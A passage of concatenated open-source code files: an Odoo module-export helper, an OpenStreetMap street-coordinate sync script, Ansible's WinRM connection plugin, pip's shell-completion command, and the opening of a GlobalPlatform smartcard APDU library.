save_icon(self): """Save the icon of the prototype as a image. The image is used afterwards as the icon of the exported module. :return: FileDetails instance """ # TODO: The image is not always a jpg. # 2 ways to do it: # * find a way to detect image type from the data # * add document as a dependency. # The second options seems to be better, as Document is a base module. return self.File_details( os.path.join('static', 'description', 'icon.jpg'), base64.b64decode(self.icon_image) ) @api.model def generate_module_openerp_file_details(self): """Wrapper to generate the __openerp__.py file of the module.""" return self.generate_file_details( '__openerp__.py', '__openerp__.py.template', prototype=self, data_files=self._data_files, demo_fiels=self._demo_files, ) @api.model def generate_module_init_file_details(self): """Wrapper to generate the __init__.py file of the module.""" return self.generate_file_details( '__init__.py', '__init__.py.template', # no import models if no work of fields in # the prototype models=bool(self.field_ids) ) @api.model def generate_models_details(self): """ Finds the models from the list of fields and generates the __init__ file and each models files (one by class). """ files = [] # TODO: doesn't work as need to find the module to import # and it is not necessary the name of the model the fields # belongs to. # ie. field.cell_phone is defined in a model inheriting from # res.partner. # How do we find the module the field was defined in? # dependencies = set([dep.id for dep in self.dependencies]) relations = {} field_descriptions = self._field_descriptions or {} for field in field_descriptions.itervalues(): model = field.get('model_id') relations.setdefault(model, []).append(field) # dependencies.add(model.id) # blind update of dependencies. # self.write({ # 'dependencies': [(6, 0, [id_ for id_ in dependencies])] # }) files.append(self.generate_models_init_details(relations.keys())) for model, custom_fields in relations.iteritems(): files.append(self.generate_model_details(model, custom_fields)) return files @api.model def generate_models_init_details(self, ir_models): """Wrapper to generate the __init__.py file in models folder.""" return self.generate_file_details( 'models/__init__.py', 'models/__init__.py.template', models=[ self.friendly_name(ir_model.model) for ir_model in ir_models ] ) @api.model def generate_views_details(self): """Wrapper to generate the views files.""" relations = {} for view in self.view_ids: relations.setdefault(view.model, []).append(view) views_details = [] for model, views in relations.iteritems(): filepath = 'views/{}_view.xml'.format( self.friendly_name(self.unprefix(model)) ) views_details.append( self.generate_file_details( filepath, 'views/model_views.xml.template', views=views ) ) self._data_files.append(filepath) return views_details @api.model def generate_menus_details(self): """Wrapper to generate the menus files.""" relations = {} for menu in self.menu_ids: if menu.action and menu.action.res_model: model = self.unprefix(menu.action.res_model) else: model = 'ir_ui' relations.setdefault(model, []).append(menu) menus_details = [] for model_name, menus in relations.iteritems(): model_name = self.unprefix(model_name) filepath = 'views/{}_menus.xml'.format( self.friendly_name(model_name) ) menus_details.append( self.generate_file_details( filepath, 'views/model_menus.xml.template', menus=menus, ) ) self._data_files.append(filepath) return menus_details @api.model def generate_model_details(self, model, field_descriptions): """Wrapper to generate the python file for the model. :param model: ir.model record. :param field_descriptions: list of ir.model.fields records. :return: FileDetails instance. """ python_friendly_name = self.friendly_name(self.unprefix(model.model)) return self.generate_file_details( 'models/{}.py'.format(python_friendly_name), 'models/model_name.py.template', name=python_friendly_name, model=model, fields=field_descriptions, ) @api.model def generate_data_files(self): """ Generate data and demo files """ data, demo = {}, {} filters = [ (data, ir_filter) for ir_filter in self.data_ids ] + [ (demo, ir_filter) for ir_filter in self.demo_ids ] for target, ir_filter in filters: model = ir_filter.model_id model_obj = self.env[model] target.setdefault(model, model_obj.browse([])) target[model] |= model_obj.search(safe_eval(ir_filter.domain)) res = [] for prefix, model_data, file_list in [ ('data', data, self._data_files), ('demo', demo, self._demo_files)]: for model_name, records in model_data.iteritems(): fname = self.friendly_name(self.unprefix(model_name)) filename = '{0}/{1}.xml'.format(prefix, fname) self._data_files.append(filename) res.append(self.generate_file_details( filename, 'data/model_name.xml.template', model=model_name, records=records, )) return res @classmethod def unprefix(cls, name): if not name: return name return re.sub('^x_', '', name) @classmethod def is_prefixed(cls, name): return bool(re.match('^x_', name)) @classmethod def friendly_name(cls, name): return name.replace('.', '_') @classmethod def fixup_domain(cls, domain): """ Fix a domain according to unprefixing of fields """ res = [] for elem in domain: if len(elem) == 3: elem = list(elem) elem[0] = cls.unprefix(elem[0]) res.append(elem) return res @classmethod def fixup_arch(cls, archstr): doc = lxml.etree.fromstring(archstr) for elem in doc.xpath("//*[@name]"): elem.attrib["name"] = cls.unprefix(elem.attrib["name"]) for elem in doc.xpath("//*[@attrs]"): try: attrs = safe_eval(elem.attrib["attrs"]) except Exception: _logger.error("Unable to eval attribute: %s, skipping", elem.attrib["attrs"]) continue if isinstance(attrs, dict): for key, val in attrs.iteritems(): if isinstance(val, (list, tuple)): attrs[key] = cls.fixup_domain(val) elem.attrib["attrs"] = repr(attrs) for elem in doc.xpath("//field"): # Make fields self-closed by removing useless whitespace if elem.text and not elem.text.strip(): elem.text = None return lxml.etree.tostring(doc) @api.model def generate_file_details(self, filename, template, **kwargs): """ generate file details from jinja2 template. :param filename: name of the file the content is related to :param template: path to the file to render the content :param kwargs: arguments of the template :return: File_details instance """ template = self._env.get_template(template) # keywords used in several templates. kwargs.update( { 'export_year': date.today().year, 'author': self.author, 'website': self.website, 'license_text': licenses.get_license_text(self.license), 'cr': self._cr, # Utility functions 'fixup_arch': self.fixup_arch, 'is_prefixed': self.is_prefixed, 'unprefix': self.unprefix, 'wrap': wrap, } ) return self.File_details(filename, template.render(kwargs)) # Utility functions for rendering templates def wrap(text, **kwargs): """ Wrap some text for inclusion in a template, returning lines keyword arguments available, from textwrap.TextWrapper: width=70 initial_indent='' subsequent_indent='' expand_tabs=True replace_whitespace=True fix_sentence_endings=False break_long_words=True drop_whitespace=True break_on_hyphens=True """ if not text: return [] wrapper = textwrap.TextWrapper(**kwargs) # We join the lines and split them again to offer a stable api for # the jinja2 templates, regardless of replace_whitspace=True|False text = "\n".join(wrapper.wrap(text)) return text.splitlines()
agpl-3.0
digifant/eMonitor
tools/update-osm-data.py
1
10402
#!/usr/bin/python # -*- coding: utf-8 -*- import logging import logging.handlers import traceback import os import time from optparse import OptionParser import MySQLdb import codecs import requests import sys import pdb import argparse from pprint import pprint def osmWebUrl (lat,lng): return "http://www.openstreetmap.org/?&mlat=%s&mlon=%s&zoom=17" % (lat,lng) def str2bool(v): if v.lower() in ('yes', 'true', 't', 'y', '1', 'j', 'ja'): return True elif v.lower() in ('no', 'false', 'f', 'n', '0', 'nein'): return False else: raise argparse.ArgumentTypeError('Boolean value expected.') def prompt(query): sys.stdout.write('%s [y/n]: ' % query) val = raw_input() try: ret = str2bool(val) except ValueError: sys.stdout.write('Please answer with a y/n\n') return prompt(query) return ret # returns None if not found! def queryOsmNominatin(street, streetno, city ): url = 'http://nominatim.openstreetmap.org/search' params = 'format=json&city={}&street={}'.format(city, street) #params = 'format=json&city=%s&street=%s' % (city, address) if streetno != '': params += ' {}'.format(streetno) params = params.replace (' ', '+') params = params.replace ('<', '&lt;') params = params.replace ('>', '&gt;') logging.debug ("OSM nominatim query: %s?%s" % (url,params)) headers = { 'User-Agent': 'OSMSyncForFireFighterStreetDbOfOurTown', 'From': 'bofhnospam@koffeinbetrieben.de' } r = requests.get('{}?{}'.format(url, params), timeout=3, headers=headers) #logging.debug("osm nomination result: %s" % pprint(r.json())) #import pdb; pdb.set_trace() _position = None try: _position = {'lat':r.json()[0]['lat'], 'lng':r.json()[0]['lon'], 'osm_id':r.json()[0]['osm_id'].decode('iso-8859-1').encode('utf8') } except IndexError: logging.error ("street %s not found! (housenumber=%s)" % (street, streetno)) #logging.debug (_position) return _position def updateMysqlStreets (db, user, passwd, command): # Open database connection db = MySQLdb.connect("localhost",user,passwd,db ) # prepare a cursor object using cursor() method cursor = db.cursor() # execute SQL query using execute() method. cursor.execute("SELECT VERSION()") # Fetch a single row using fetchone() method. data = cursor.fetchone() print "Database version : %s " % data not_found = {} if command == "update_position": sql = "SELECT * FROM streets" try: cursor.execute(sql) results = cursor.fetchall() for row in results: print ("Street DB %s lat=%s lng=%s" % (row[1].decode('iso-8859-1').encode('utf8'), row[5], row[6]) ) if ( row[0] > 0 ): _position = queryOsmNominatin (street=row[1].decode('iso-8859-1').encode('utf8'), streetno='', city='Kleinblittersdorf') #No heavy uses (an absolute maximum of 1 request per second). #http://wiki.openstreetmap.org/wiki/Nominatim_usage_policy time.sleep (1) if _position != None: if row[9] == int(_position['osm_id']): sql = 'update streets set lat=%s, lng=%s where id = %s' % (float(_position['lat']), float(_position['lng']), int(row[0])) logging.debug ("sql query %s" % sql) try: cursor.execute(sql) db.commit() logging.info ("street %s updated lat and lng to (%s,%s)" % (row[1].decode('iso-8859-1').encode('utf8'), float(_position['lat']), float(_position['lng']))) except: db.rollback() logging.error ("SQL Error %s" % traceback.format_exc()) else: logging.fatal ("OSMID stimmt nicht überein! %s vs %s" % (row[9], _position['osm_id'] )) else: logging.fatal ("OSM nominatin Query failed!") not_found[row[0]] = row[1].decode('iso-8859-1').encode('utf8') except: logging.error ("DB Error %s" % traceback.format_exc() ) # disconnect from server db.close() logging.info ("Sync finished") if len(not_found) > 0: logging.error ("didnt found %s streets:" % len(not_found)) for k in not_found.keys(): logging.error ("not found: id=%s streetname=%s" % (k, not_found[k])) def verifyMysqlStreets (db, user, passwd, command, street=-1): # Open database connection db = MySQLdb.connect("localhost",user,passwd,db ) # prepare a cursor object using cursor() method cursor = db.cursor() # execute SQL query using execute() method. cursor.execute("SELECT VERSION()") # Fetch a single row using fetchone() method. data = cursor.fetchone() print "Database version : %s " % data not_found = {} if command == "verify_streets": sql = "SELECT * FROM streets" if street > 0: sql = sql + " where id=%i" % street try: cursor.execute(sql) results = cursor.fetchall() for row in results: print ("Street %s lat=%s lng=%s url=%s" % (row[1].decode('iso-8859-1').encode('utf8'), row[5], row[6], osmWebUrl(row[5],row[6]) ) ) if ( row[0] > 0 ): _position = queryOsmNominatin (street=row[1].decode('iso-8859-1').encode('utf8'), streetno='', city='Kleinblittersdorf') if _position != None: sql = 'update streets set lat=%s, lng=%s, osmid=%s where id = %s' % (float(_position['lat']), float(_position['lng']), int(_position['osm_id']), int(row[0])) logging.debug ("sql query %s" % sql) if row[9] == int(_position['osm_id']): logging.info ("osmid=%s db lat=%s db lng=%s OsmNominatim lat=%s lng=%s new url=%s" % (row[9], row[5], row[6], float(_position['lat']), float(_position['lng']), osmWebUrl(float(_position['lat']),float(_position['lng'])) ) ) if round(float(row[5]),4) != round(float(_position['lat']),4) or round(float(row[6]),4) != round(float(_position['lng']),4): logging.info ("%i NO MATCH" % row[9]) if options.ask_fix and prompt ("Fix?"): try: cursor.execute(sql) db.commit() logging.info ("street %s updated lat, lng, osmid to (%s,%s,%s)" % (row[1].decode('iso-8859-1').encode('utf8'), float(_position['lat']), float(_position['lng']), (_position['osm_id']))) except: db.rollback() logging.error ("SQL Error %s" % traceback.format_exc()) else: logging.info ("%i MATCH" % row[9]) else: logging.fatal ("OSMID stimmt nicht überein! %s vs %s url=%s" % (row[9], _position['osm_id'], osmWebUrl(float(_position['lat']),float(_position['lng'])))) if options.ask_fix and prompt ("Fix?"): try: cursor.execute(sql) db.commit() logging.info ("street %s updated lat, lng, osmid to (%s,%s,%s)" % (row[1].decode('iso-8859-1').encode('utf8'), float(_position['lat']), float(_position['lng']), (_position['osm_id']))) except: db.rollback() logging.error ("SQL Error %s" % traceback.format_exc()) else: logging.fatal ("OSM nominatin Query failed!") not_found[row[0]] = row[1].decode('iso-8859-1').encode('utf8') #No heavy uses (an absolute maximum of 1 request per second). #http://wiki.openstreetmap.org/wiki/Nominatim_usage_policy time.sleep (1) except: logging.error ("DB Error %s" % traceback.format_exc() ) # disconnect from server db.close() logging.info ("verify finished") if __name__ == '__main__': parser = OptionParser() parser.add_option("-d", "--database", dest="database", help="mysql database name", default="emonitor") parser.add_option("-u", "--user", dest="user", help="mysql user", default='emonitor') parser.add_option("-p", "--passwd", dest="passwd", help="mysql password", default='emonitor') parser.add_option("--update-streets-position", dest="update_streets_position", help="update positions for all streets", action="store_true", default=False) parser.add_option("--verify-street-position", dest="verify_street_position", help="verify positions for given street", type=int, default=-1) parser.add_option("-v", "--verify-all-streets-position", dest="verify_all_streets_position", help="verify positions for given street", action="store_true", default=False) parser.add_option("-a", "--ask-fix", dest="ask_fix", help="ask for fixing", action="store_true", default=False) (options, args) = parser.parse_args() #logging.basicConfig(filename='screenshot-and-telegram.log', level=logging.DEBUG) logging.basicConfig(level=logging.DEBUG) if options.update_streets_position: updateMysqlStreets (db=options.database, user=options.user, passwd=options.passwd, command="update_position") if options.verify_street_position > 0: verifyMysqlStreets (db=options.database, user=options.user, passwd=options.passwd, command="verify_streets", street=int(options.verify_street_position)) if options.verify_all_streets_position: verifyMysqlStreets (db=options.database, user=options.user, passwd=options.passwd, command="verify_streets") #queryOsmNominatin(street="Rexrothstraße", streetno='', city='Kleinblittersdorf')
bsd-3-clause
graingert/ansible
lib/ansible/plugins/connections/winrm.py
12
12782
# (c) 2014, Chris Church <chris@ninemoreminutes.com> # # This file is part of Ansible. # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. from __future__ import (absolute_import, division, print_function) __metaclass__ = type import base64 import os import re import shlex import traceback from six.moves.urllib import parse try: from winrm import Response from winrm.exceptions import WinRMTransportError from winrm.protocol import Protocol except ImportError: raise AnsibleError("winrm is not installed") HAVE_KERBEROS = False try: import kerberos HAVE_KERBEROS = True except ImportError: pass from ansible import constants as C from ansible.errors import AnsibleError, AnsibleConnectionFailure, AnsibleFileNotFound from ansible.plugins.connections import ConnectionBase from ansible.plugins import shell_loader from ansible.utils.path import makedirs_safe from ansible.utils.unicode import to_bytes class Connection(ConnectionBase): '''WinRM connections over HTTP/HTTPS.''' transport_schemes = { 'http': [('kerberos', 'http'), ('plaintext', 'http'), ('plaintext', 'https')], 'https': [('kerberos', 'https'), ('plaintext', 'https')], } def __init__(self, *args, **kwargs): self.has_pipelining = False self.default_suffixes = ['.ps1', ''] self.protocol = None self.shell_id = None self.delegate = None self._shell_type = 'powershell' # TODO: Add runas support self.become_methods_supported=[] super(Connection, self).__init__(*args, **kwargs) @property def transport(self): ''' used to identify this connection object from other classes ''' return 'winrm' def _winrm_connect(self): ''' Establish a WinRM connection over HTTP/HTTPS. ''' port = self._play_context.port or 5986 self._display.vvv("ESTABLISH WINRM CONNECTION FOR USER: %s on PORT %s TO %s" % \ (self._play_context.remote_user, port, self._play_context.remote_addr), host=self._play_context.remote_addr) netloc = '%s:%d' % (self._play_context.remote_addr, port) exc = None for transport, scheme in self.transport_schemes['http' if port == 5985 else 'https']: if transport == 'kerberos' and (not HAVE_KERBEROS or not '@' in self._play_context.remote_user): continue if transport == 'kerberos': realm = self._play_context.remote_user.split('@', 1)[1].strip() or None else: realm = None endpoint = parse.urlunsplit((scheme, netloc, '/wsman', '', '')) self._display.debug('WINRM CONNECT: transport=%s endpoint=%s' % (transport, endpoint), host=self._play_context.remote_addr) protocol = Protocol( endpoint, transport=transport, username=self._play_context.remote_user, password=self._play_context.password, realm=realm ) try: protocol.send_message('') return protocol except WinRMTransportError as exc: err_msg = str(exc) if re.search(r'Operation\s+?timed\s+?out', err_msg, re.I): raise AnsibleError("the connection attempt timed out") m = re.search(r'Code\s+?(\d{3})', err_msg) if m: code = int(m.groups()[0]) if code == 401: raise AnsibleError("the username/password specified for this server was incorrect") elif code == 411: return protocol self._display.debug('WINRM CONNECTION ERROR: %s' % err_msg, host=self._play_context.remote_addr) continue if exc: raise AnsibleError(str(exc)) def _winrm_exec(self, command, args=(), from_exec=False): if from_exec: self._display.debug("WINRM EXEC %r %r" % (command, args), host=self._play_context.remote_addr) else: self._display.debugv("WINRM EXEC %r %r" % (command, args), host=self._play_context.remote_addr) if not self.protocol: self.protocol = self._winrm_connect() if not self.shell_id: self.shell_id = self.protocol.open_shell() command_id = None try: command_id = self.protocol.run_command(self.shell_id, command, args) response = Response(self.protocol.get_command_output(self.shell_id, command_id)) if from_exec: self._display.debug('WINRM RESULT %r' % response, host=self._play_context.remote_addr) else: self._display.debugv('WINRM RESULT %r' % response, host=self._play_context.remote_addr) self._display.debugv('WINRM STDOUT %s' % response.std_out, host=self._play_context.remote_addr) self._display.debugv('WINRM STDERR %s' % response.std_err, host=self._play_context.remote_addr) return response finally: if command_id: self.protocol.cleanup_command(self.shell_id, command_id) def _connect(self): if not self.protocol: self.protocol = self._winrm_connect() return self def exec_command(self, cmd, tmp_path, in_data=None, sudoable=True): super(Connection, self).exec_command(cmd, tmp_path, in_data=in_data, sudoable=sudoable) cmd = to_bytes(cmd) cmd_parts = shlex.split(cmd, posix=False) if '-EncodedCommand' in cmd_parts: encoded_cmd = cmd_parts[cmd_parts.index('-EncodedCommand') + 1] decoded_cmd = base64.b64decode(encoded_cmd) self._display.vvv("EXEC %s" % decoded_cmd, host=self._play_context.remote_addr) else: self._display.vvv("EXEC %s" % cmd, host=self._play_context.remote_addr) # For script/raw support. if cmd_parts and cmd_parts[0].lower().endswith('.ps1'): script = self._shell._build_file_cmd(cmd_parts, quote_args=False) cmd_parts = self._shell._encode_script(script, as_list=True) try: result = self._winrm_exec(cmd_parts[0], cmd_parts[1:], from_exec=True) except Exception as e: traceback.print_exc() raise AnsibleError("failed to exec cmd %s" % cmd) result.std_out = to_bytes(result.std_out) result.std_err = to_bytes(result.std_err) return (result.status_code, '', result.std_out, result.std_err) def put_file(self, in_path, out_path): super(Connection, self).put_file(in_path, out_path) self._display.vvv("PUT %s TO %s" % (in_path, out_path), host=self._play_context.remote_addr) if not os.path.exists(in_path): raise AnsibleFileNotFound("file or module does not exist: %s" % in_path) with open(in_path) as in_file: in_size = os.path.getsize(in_path) script_template = ''' $s = [System.IO.File]::OpenWrite("%s"); [void]$s.Seek(%d, [System.IO.SeekOrigin]::Begin); $b = [System.Convert]::FromBase64String("%s"); [void]$s.Write($b, 0, $b.length); [void]$s.SetLength(%d); [void]$s.Close(); ''' # Determine max size of data we can pass per command. script = script_template % (self._shell._escape(out_path), in_size, '', in_size) cmd = self._shell._encode_script(script) # Encode script with no data, subtract its length from 8190 (max # windows command length), divide by 2.67 (UTF16LE base64 command # encoding), then by 1.35 again (data base64 encoding). buffer_size = int(((8190 - len(cmd)) / 2.67) / 1.35) for offset in xrange(0, in_size, buffer_size): try: out_data = in_file.read(buffer_size) if offset == 0: if out_data.lower().startswith('#!powershell') and not out_path.lower().endswith('.ps1'): out_path = out_path + '.ps1' b64_data = base64.b64encode(out_data) script = script_template % (self._shell._escape(out_path), offset, b64_data, in_size) self._display.debug("WINRM PUT %s to %s (offset=%d size=%d)" % (in_path, out_path, offset, len(out_data)), host=self._play_context.remote_addr) cmd_parts = self._shell._encode_script(script, as_list=True) result = self._winrm_exec(cmd_parts[0], cmd_parts[1:]) if result.status_code != 0: raise IOError(result.std_err.encode('utf-8')) except Exception: traceback.print_exc() raise AnsibleError("failed to transfer file to %s" % out_path) def fetch_file(self, in_path, out_path): super(Connection, self).fetch_file(in_path, out_path) out_path = out_path.replace('\\', '/') self._display.vvv("FETCH %s TO %s" % (in_path, out_path), host=self._play_context.remote_addr) buffer_size = 2**19 # 0.5MB chunks makedirs_safe(os.path.dirname(out_path)) out_file = None try: offset = 0 while True: try: script = ''' If (Test-Path -PathType Leaf "%(path)s") { $stream = [System.IO.File]::OpenRead("%(path)s"); $stream.Seek(%(offset)d, [System.IO.SeekOrigin]::Begin) | Out-Null; $buffer = New-Object Byte[] %(buffer_size)d; $bytesRead = $stream.Read($buffer, 0, %(buffer_size)d); $bytes = $buffer[0..($bytesRead-1)]; [System.Convert]::ToBase64String($bytes); $stream.Close() | Out-Null; } ElseIf (Test-Path -PathType Container "%(path)s") { Write-Host "[DIR]"; } Else { Write-Error "%(path)s does not exist"; Exit 1; } ''' % dict(buffer_size=buffer_size, path=self._shell._escape(in_path), offset=offset) self._display.debug("WINRM FETCH %s to %s (offset=%d)" % (in_path, out_path, offset), host=self._play_context.remote_addr) cmd_parts = self._shell._encode_script(script, as_list=True) result = self._winrm_exec(cmd_parts[0], cmd_parts[1:]) if result.status_code != 0: raise IOError(result.std_err.encode('utf-8')) if result.std_out.strip() == '[DIR]': data = None else: data = base64.b64decode(result.std_out.strip()) if data is None: makedirs_safe(out_path) break else: if not out_file: # If out_path is a directory and we're expecting a file, bail out now. if os.path.isdir(out_path): break out_file = open(out_path, 'wb') out_file.write(data) if len(data) < buffer_size: break offset += len(data) except Exception: traceback.print_exc() raise AnsibleError("failed to transfer file to %s" % out_path) finally: if out_file: out_file.close() def close(self): if self.protocol and self.shell_id: self.protocol.close_shell(self.shell_id) self.shell_id = None
gpl-3.0
ntuecon/server
pyenv/Lib/site-packages/pip/commands/completion.py
343
2453
from __future__ import absolute_import import sys from pip.basecommand import Command BASE_COMPLETION = """ # pip %(shell)s completion start%(script)s# pip %(shell)s completion end """ COMPLETION_SCRIPTS = { 'bash': """ _pip_completion() { COMPREPLY=( $( COMP_WORDS="${COMP_WORDS[*]}" \\ COMP_CWORD=$COMP_CWORD \\ PIP_AUTO_COMPLETE=1 $1 ) ) } complete -o default -F _pip_completion pip """, 'zsh': """ function _pip_completion { local words cword read -Ac words read -cn cword reply=( $( COMP_WORDS="$words[*]" \\ COMP_CWORD=$(( cword-1 )) \\ PIP_AUTO_COMPLETE=1 $words[1] ) ) } compctl -K _pip_completion pip """, 'fish': """ function __fish_complete_pip set -lx COMP_WORDS (commandline -o) "" set -lx COMP_CWORD (math (contains -i -- (commandline -t) $COMP_WORDS)-1) set -lx PIP_AUTO_COMPLETE 1 string split \ -- (eval $COMP_WORDS[1]) end complete -fa "(__fish_complete_pip)" -c pip """} class CompletionCommand(Command): """A helper command to be used for command completion.""" name = 'completion' summary = 'A helper command used for command completion.' def __init__(self, *args, **kw): super(CompletionCommand, self).__init__(*args, **kw) cmd_opts = self.cmd_opts cmd_opts.add_option( '--bash', '-b', action='store_const', const='bash', dest='shell', help='Emit completion code for bash') cmd_opts.add_option( '--zsh', '-z', action='store_const', const='zsh', dest='shell', help='Emit completion code for zsh') cmd_opts.add_option( '--fish', '-f', action='store_const', const='fish', dest='shell', help='Emit completion code for fish') self.parser.insert_option_group(0, cmd_opts) def run(self, options, args): """Prints the completion code of the given shell""" shells = COMPLETION_SCRIPTS.keys() shell_options = ['--' + shell for shell in sorted(shells)] if options.shell in shells: script = COMPLETION_SCRIPTS.get(options.shell, '') print(BASE_COMPLETION % {'script': script, 'shell': options.shell}) else: sys.stderr.write( 'ERROR: You must pass %s\n' % ' or '.join(shell_options) )
bsd-3-clause
suma12/asterix
asterix/APDU.py
1
31348
""" asterix/APDU.py __author__ = "Petr Tobiska" Author: Petr Tobiska, mailto:petr.tobiska@gmail.com This file is part of asterix, a framework for communication with smartcards based on pyscard. This file implements handfull APDU commands. asterix is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. asterix is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with pyscard; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA References: [GP CS] GlobalPlatform Card Specification, Version 2.2.1, Jan 2011 [GP AmD] Secure Channel Protocol 03, Card Specification v 2.2 - Amendment D, Version 1.1, Sep 2009 """ import re import hashlib import random from struct import pack, unpack from binascii import hexlify, unhexlify # PyCrypto from Crypto.Cipher import DES, DES3, AES # ECSDA from ecdsa import ecdsa, ellipticcurve # pyscard from smartcard.ATR import ATR # asterix from formutil import s2l, l2s, derLen, derLV, s2int, int2s, s2ECP, chunks,\ split2TLV, findTLValue, swapNibbles from GAF import GAF from applet import DESsign from SCP03 import CMAC from mycard import ISOException, resetCard __all__ = ('calcKCV', 'putKey', 'storeDataPutKey', 'push2B_DGI', 'X963keyDerivation', 'Push3scenario', 'selectApplet', 'openLogCh', 'closeLogCh', 'getStatus', 'getExtCardRes', 'getData', 'selectFile', 'readBinary', 'readRecord', 'updateBinary', 'updateRecord', 'verifyPin', 'changePin', 'disablePin', 'enablePin', 'unblockPin', 'selectUSIM', 'cardInfo', 'KeyType') INS_VERIFY_PIN = 0x20 INS_CHANGE_PIN = 0x24 INS_DISABLE_PIN = 0x26 INS_ENABLE_PIN = 0x28 INS_UNBLOCK_PIN = 0x2C INS_MANAGE_LOGCH = 0x70 INS_SELECT = 0xA4 INS_READBIN = 0xB0 INS_READREC = 0xB2 INS_GETDATA = 0xCA INS_UPDBIN = 0xD6 INS_UPDREC = 0xDC INS_PUTKEY = 0xD8 INS_STOREDATA = 0xE2 INS_GETSTATUS = 0xF2 class KeyType: """Key types as defined in [GP CS] Tab 11.16""" # subset of currently supported keys DES_IMPLICIT = 0x80 TDES_CBC = 0x82 DES_ECB = 0x83 DES_CBC = 0x84 AES = 0x88 def calcKCV(keyValue, zAES=False): """Calculate KCV for symmetric key. keyValue - key values as string (DES, 3DES2k, 3DES3k, AES) zAES - True if key is AES (i.e. encrypt block of '01' instead of '00') Return 3B-long string.""" if zAES: assert len(keyValue) in (16, 24, 32), "Wrong length of AES key" block = '\x01'*16 tkey = AES.new(keyValue, AES.MODE_ECB) else: assert len(keyValue) in (8, 16, 24), "Wrong length of (3)DES key" block = '\x00'*8 if len(keyValue) == 8: tkey = DES.new(keyValue, DES.MODE_ECB) else: tkey = DES3.new(keyValue, DES.MODE_ECB) return tkey.encrypt(block)[:3] def putKey(oldKeyVersion, newKeyVersion, keyId, keyComponents, zMoreCmd=False, zMultiKey=False, keyDEK=None, lenMAC=8): """Build APDU for PUT KEY command. oldKeyVersion - key version to be replaced. If zero, new key is created. newKeyVersion - key version of key being put keyId - id of the 1st key being put keyComponents - list of key components being put. Each componet is a tuple of key type (u8) and value (string). zMoreCmd - P1.b8, signals if there is more commands zMultiKey - P2.b8, signals if more than one component being put keyDEK - KIK or DEK key. keyDEK.encrypt(data) called to encrypt (including padding) key component value if not None. If has attribute zAES and keyDEK.zAES evaluates as True, it is considered as AES key and [GP AmD] 7.2 formatting is used. lenMAC - length of CMAC for AES. Applicable if AES key with key id=0x02 (KID) and key version 0x01-0x0F or 0x11 is being put with AES keyDEK (see ETSI 102.226 rel 9+, 8.2.1.5) Returns APDU built (as list of u8). See [GP CS] 11.8 and [GP AmD] 7.2 for reference. See [GP CS] Tab 11.16 for coding of key type. Currently only Format1 supported. """ # sanity check assert 0 <= oldKeyVersion < 0x80 assert 0 < newKeyVersion < 0x80 assert 0 < keyId < 0x80 assert len(keyComponents) > 0 assert lenMAC in (4, 8) P1 = (zMoreCmd and 0x80 or 0) | oldKeyVersion P2 = (zMultiKey and 0x80 or 0) | keyId data = chr(newKeyVersion) for kc in keyComponents: keyType, keyVal = kc[:2] # ignore eventual keyUsage and keyAccess assert 0 <= keyType < 0xFF if keyDEK: encValue = keyDEK.encrypt(keyVal) # for AES as keyDEK, prepend length of component if 'zAES' in dir(keyDEK) and keyDEK.zAES: encValue = derLen(keyVal) + encValue # see ETSI 102.226 rel 9+, 8.2.1.5 if keyType == KeyType.AES and keyId == 2 and \ newKeyVersion in range(0x01, 0x10) + [0x11]: encValue += chr(lenMAC) else: encValue = keyVal # calculate KCV if keyType in (KeyType.DES_IMPLICIT, KeyType.TDES_CBC, KeyType.DES_ECB, KeyType.DES_CBC, KeyType.AES): kcv = calcKCV(keyVal, keyType == KeyType.AES) else: kcv = '' data += chr(keyType) + derLen(encValue) + encValue + derLen(kcv) + kcv keyId += 1 apdu = [0x80, INS_PUTKEY, P1, P2, len(data)] + s2l(data) return apdu def push2B_DGI(keyVer, keys, keyCASDenc): """ Create DGI 00A6 and 8010 for Push2B scenario keyVer - key verions (u8) keys - ((keytype, keyvalue)); 1 or 3 sym. keys keyCASDenc - a method to call for encryption 8010 content Return DGIs built (as list of strings).""" # DGI tag on 2B (GP Card Spec 2.2.1, 11.1.12) # DGI length coding as in GP Systems Scripting Language Spec. v1.1.0, an. B # i.e. on 1B for x < 255, FF<yyyy> for x >=255 KAT = GAF(""" -- Control Reference Template (KAT) -- see GP 2.2.1 AmA 4.4 00A6 #[ A6 #( 90 #(04) -- scenario identifier: Push#2B 95 #($keyUsage) 80 #($keyType) 81 #($keyLen) 83 #($keyVer) -- 45 #($SDIN) -- optional Security Domain Image Number )] """) assert len(keys) in (1, 3), "One or three sym. keys expected" keyUsage = len(keys) == 1 and '\x5C' or '\x10' # Tab. 13 keyType = keys[0][0] assert all([k[0] == keyType for k in keys]), "Key types differ" # remap keyType to '80' as required by GP UICC config 10.3.1 if keyType in (KeyType.TDES_CBC, KeyType.DES_ECB, KeyType.DES_CBC): keyType = KeyType.DES_IMPLICIT lens = [len(k[1]) for k in keys] l = max(lens) assert l == min(lens), "Key lengths differ" dgi00A6 = KAT.eval(keyUsage=keyUsage, keyType=chr(keyType), keyLen=chr(l), keyVer=chr(keyVer)) data = keyCASDenc(''.join([k[1] for k in keys])) dgi8010 = pack(">H", 0x8010) + chr(len(data)) + data return (dgi00A6, dgi8010) def storeDataPutKeyDGI(keyVer, keyComponents, keyId=1, keyDEK=None): """Build DGI for Store Data for Put Key. keyVer - key version of key being created keyComponents - list of key components being put. Each componet is a tuple of key type (u8), value (string) and optionally Key Usage Qualifier and Key Access (u8, defaults 0x18, 0x14 or 0x48 for key UQ, 0x00 for key ac.) keyId - id of the 1st key being created (optional, u8, default 1) keyDEK - KIK or DEK key. keyDEK.encrypt(data) called to encrypt (including padding) key component value if not None. If has attribute zAES and keyDEK.zAES evaluates as True, it is considered as AES key and [GP AmD] 7.2 formatting is used. Returns DGIs built (as list of string). See GP 2.2.1 AmA 4.10.2 